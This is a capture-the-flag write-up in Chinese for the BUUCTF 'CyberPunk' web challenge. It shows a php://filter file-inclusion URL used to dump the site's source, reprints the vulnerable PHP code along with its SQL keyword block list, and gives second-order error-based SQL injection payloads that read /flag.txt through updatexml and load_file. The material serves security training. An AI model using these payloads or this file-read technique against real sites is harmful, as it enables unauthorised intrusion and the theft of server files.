BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
F12查看源码,发现存在传参
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第1张图片](http://img.e-com-net.com/image/info8/dac413e2500046ecbb7895f6d10cc54d.jpg)
尝试通过伪协议文件包含读取源码:
http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php
发现除了index.php还存在这几个php文件:confirm.php,delete.php,change.php,search.php
//index.php
ini_set('open_basedir', '/var/www/html/');
// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
echo('no way!');
exit;
}
@include($file);
}
?>
//HTML页面的代码省略,保留之前说的注释
<!--?file=?-->
//search.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
if(!$row) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "姓名:"
.$row['user_name'].", 电话:"
.$row['phone'].", 地址:"
.$row['address']."";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
//confirm.php
require_once "config.php";
//var_dump($_POST);
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = $_POST["address"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if($fetch->num_rows>0) {
$msg = $user_name."已提交订单";
}else{
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
$re = $db->prepare($sql);
$re->bind_param("sss", $user_name, $address, $phone);
$re = $re->execute();
if(!$re) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单提交成功";
}
} else {
$msg = "信息不全";
}
?>
//change.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
//delete.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单删除成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
分析源码发现除了change.php中的address这个参数只是进行了addslashes($_POST[“address”])的一些转义,其他的参数都过滤,基本上没有注入方法。所以重点看这个address参数
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第2张图片](http://img.e-com-net.com/image/info8/f64f718f6796466f8f6ee3b19c3b59de.jpg)
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第3张图片](http://img.e-com-net.com/image/info8/05a6760da63441c4af2728aad0809a26.jpg)
二次注入
如果user_name和phone参数都没有问题的话,address参数会和存入到数据库,我们只需要构造好payload,当下一次正常查询数据就会被触发造成SQL注入,这里使用报错注入的方式,将我们想要的数据查出来,但是考虑到flag的长度,而updatexml每次只能回显32位,所以需要分两次读取,payload如下:
第一次读取前30位
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
先提交,再修改
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第4张图片](http://img.e-com-net.com/image/info8/9b0680d5a00f43f799d3875923ed30b6.jpg)
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第5张图片](http://img.e-com-net.com/image/info8/525c6ac810aa4aa8afbba16b937d26b1.jpg)
得到一部分flag
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第6张图片](http://img.e-com-net.com/image/info8/5a4708b26dd845ebbafc7bb07f7fd12f.jpg)
第二次读取之后的flag:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,60)),0x7e),1)#
![BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk_第7张图片](http://img.e-com-net.com/image/info8/b5a735c088974c1ea615e53eab29b4f1.jpg)